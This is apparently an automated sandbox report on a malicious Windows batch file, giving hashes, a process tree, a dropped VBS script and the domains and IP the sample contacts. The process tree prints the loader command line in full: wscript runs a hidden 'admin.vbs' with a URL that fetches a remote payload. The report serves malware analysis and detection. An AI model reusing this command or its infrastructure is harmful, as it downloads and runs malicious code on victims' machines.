File name: | Be-kOPmZrE4b1hZ72_cA.cmd |
Full analysis: | https://app.any.run/tasks/b97027c6-34c4-4da7-9e21-b6ffd70c451e |
Verdict: | Malicious activity |
Analysis date: | June 19, 2019, 16:52:23 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Indicators: | |
MIME: | text/x-msdos-batch |
File info: | DOS batch file, ASCII text, with very long lines, with CRLF line terminators |
MD5: | 34059A0DCD7FF5F42DB49435BF4210C1 |
SHA1: | 7002F75EF2DE1E1D8267E41B60CC4170EDA1ED59 |
SHA256: | 86E1BFAE16AA445206240C9C501369846D43B978D120C60E0CCE755C98FDD2A4 |
SSDEEP: | 48:/G7dI5RtNyyRO+8+wwn08QNn3eO5Mz8n5iq85katzg/g5yZ9z4+XvBwDU94xDhr:55RXz5dg73Yz0F/g5+wqu1r |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
2000 | cmd /c ""C:\Users\admin\AppData\Local\Temp\Be-kOPmZrE4b1hZ72_cA.cmd" " | C:\Windows\system32\cmd.exe | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
1344 | ping 127.0.0.1 -n 1 | C:\Windows\system32\PING.EXE | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: TCP/IP Ping Command Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
2508 | wscript //Nologo "C:\ProgramData\.VVVVVjt\admin.vbs" AS111 https://pt-br.ooguy.com/appkcmd/aHR0cHM6Ly9zdG9yYWdlLmdvb2dsZWFwaXMuY29tL2NvbnNvbGVjbG91ZC9mb2xkZXItamgvc2diZ2Q2a3kzOS5ibXAmbm8tcG93ZXI= | C:\Windows\system32\wscript.exe | cmd.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft ® Windows Based Script Host Version: 5.8.7600.16385 |
PID | Process | Filename | Type | |
---|---|---|---|---|
2000 | cmd.exe | C:\ProgramData\.VVVVVjt\admin.vbs | text | |
MD5:AAFB3FEF09724D896CEAA2D1E4554294 | SHA256:B098BA4F64DF89592C6EE7B9C2FC86A6099EEB784D519A2CCF9DC1A93CF51869 |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
2508 | wscript.exe | 54.207.55.139:443 | pt-br.ooguy.com | Amazon.com, Inc. | BR | unknown |
Domain | IP | Reputation |
---|---|---|
pt-br.ooguy.com |
| unknown |
edzz.la |
| unknown |